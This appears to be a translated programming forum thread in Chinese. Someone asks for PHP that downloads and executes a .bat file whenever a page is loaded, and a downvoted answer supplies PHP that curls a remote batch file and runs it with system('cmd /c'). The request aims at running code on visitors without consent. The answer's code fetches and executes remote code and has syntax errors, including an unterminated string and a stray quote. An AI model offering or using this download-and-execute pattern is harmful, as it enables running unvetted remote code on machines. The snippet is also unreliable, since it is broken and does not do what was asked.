我忘记了那个PHP的代码。任何人帮助我,我想在网页加载过程中下载并执行.bat文件。示例:如果有人在下载和执行.bat文件的时间内加载页面时打开xyz.com。请帮助我获取完整的代码。提前谢谢。
答案 0 :(得分:-2)
试试这个
<?php
$fp = fopen (dirname(__FILE__) . '/file.bat', 'w+');
$ch = curl_init("http://filesite/file.bat));
curl_setopt($ch, CURLOPT_TIMEOUT, 50);
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_exec($ch);
curl_close($ch);
fclose($fp);
system("cmd /c ".dirname(__FILE__) . '/file.bat'");
?>